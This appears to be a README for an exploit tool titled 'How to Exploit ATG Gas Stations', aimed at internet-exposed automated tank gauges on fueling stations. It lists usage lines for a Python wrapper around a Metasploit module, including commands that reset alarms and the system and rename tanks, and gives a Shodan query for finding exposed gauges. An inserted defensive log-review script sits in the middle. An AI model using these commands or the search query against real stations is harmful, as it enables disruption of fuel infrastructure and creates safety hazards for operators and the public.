How to Exploit ATG Gas Stations
Overview
Automated tank gauges (ATGs) are used to monitor fuel tank inventory levels, track deliveries, raise alarms that indicate problems with the tank or gauge (such as a fuel spill), and perform leak tests in accordance with environmental regulatory compliance. ATGs are used by nearly every fueling station in the United States and by tens of thousands of systems internationally.
Many ATGs can be programmed and monitored through a built-in serial port, a plug-in serial port, a fax/modem, or a TCP/IP circuit board. To monitor these systems remotely, many operators use a TCP/IP card or a third-party serial port server to map the ATG serial interface to an internet-facing TCP port. The most common configuration is to map the interface to TCP port 10001. Although some systems can password-protect the serial interface, this is not commonly implemented.
Approximately 5,800 ATGs were found to be exposed to the internet without a password. Over 5,300 of these ATGs are located in the United States, which works out to about 3 percent of the approximately 150,000 fueling stations in the country.
An attacker with access to the serial port interface of an ATG may be able to shut down the station by spoofing the reported fuel level, generating false alarms, and locking the monitoring service out of the system. Tank gauge malfunctions are considered serious because of the regulatory and safety issues that may apply.
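For operators, the exposure described above shows up in perimeter logs as connections to TCP port 10001 from sources other than the monitoring service. The following is an added example, not part of the original PoC: it reviews firewall log lines for such connections. The log format, the allowlisted networks and all addresses are constructed assumptions.

```python
import ipaddress
from collections import Counter, defaultdict

ATG_PORT = 10001  # most common serial-to-TCP mapping, per the overview

# Assumption: networks the legitimate monitoring service connects from (constructed).
ALLOWED_SOURCES = [
    ipaddress.ip_network("10.20.0.0/16"),
    ipaddress.ip_network("192.0.2.16/28"),
]

# Constructed sample in an assumed "time src dst dport action" format.
SAMPLE_LOG = """\
2025-01-10T08:00:01Z 10.20.4.7 10.50.1.20 10001 ALLOW
2025-01-10T08:03:12Z 198.51.100.23 10.50.1.20 10001 ALLOW
2025-01-10T08:03:15Z 198.51.100.23 10.50.1.20 10001 ALLOW
2025-01-10T08:04:40Z 203.0.113.9 10.50.1.20 10001 DENY
2025-01-10T08:05:00Z 203.0.113.9 10.50.1.20 443 ALLOW
2025-01-10T08:06:30Z 192.0.2.18 10.50.1.21 10001 ALLOW
malformed line
"""

def unexpected_atg_access(log_text, port=ATG_PORT):
    """Count ATG-port connections per (src, dst) from non-allowlisted sources, by action."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip lines that do not match the assumed format
        _, src, dst, dport, action = fields
        try:
            src_ip = ipaddress.ip_address(src)
            port_no = int(dport)
        except ValueError:
            continue
        if port_no != port or any(src_ip in net for net in ALLOWED_SOURCES):
            continue
        hits[(src, dst)][action] += 1
    return {pair: dict(actions) for pair, actions in hits.items()}

def exposed(report):
    """Pairs where the firewall let an unexpected source reach the ATG port."""
    return sorted(pair for pair, acts in report.items() if acts.get("ALLOW"))

if __name__ == "__main__":
    report = unexpected_atg_access(SAMPLE_LOG)
    for src, dst in exposed(report):
        print(f"ALERT {src} -> {dst}:{ATG_PORT} allowed {report[(src, dst)]['ALLOW']}x")
```

Any pair returned by exposed() means the gauge is reachable from outside the monitoring path and should be moved behind a VPN or a source-restricted rule, with the serial interface password enabled where the system supports it.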
PoC
Please note that the PoC is a simple Python wrapper for the Metasploit module that is already available.
Commands
- ALARM
- ALARM_RESET
- DELIVERY
- INVENTORY
- LEAK
- RELAY
- RESET
- CLEAR_RESET
- SENSOR
- SENSOR_DIAG
- SHIFT
- SET_TANK_NAME
- STATUS
- SYSTEM_STATUS
- TANK_ALARM
- TANK_DIAG
- VERSION
Get reports
.\poc.py -i IP -c DELIVERY
.\poc.py -i IP -c INVENTORY
.\poc.py -i IP -c LEAK
.\poc.py -i IP -c SHIFT
.\poc.py -i IP -c STATUS
.\poc.py -i IP -c SYSTEM_STATUS
Get stats
.\poc.py -i IP -c RELAY
.\poc.py -i IP -c SENSOR
Get diagnostics
.\poc.py -i IP -c SENSOR_DIAG
.\poc.py -i IP -c TANK_DIAG
Get history
.\poc.py -i IP -c ALARM
.\poc.py -i IP -c TANK_ALARM
Make system changes (not recommended)
.\poc.py -i IP -c ALARM_RESET
.\poc.py -i IP -c CLEAR_RESET
.\poc.py -i IP -c RESET
.\poc.py -i IP -c SET_TANK_NAME
Notably, some airports are also affected by this flaw.
Shodan
DIESEL "IN-TANK INVENTORY" "2025"
The user is solely responsible for their actions and use of the program. For educational purposes only.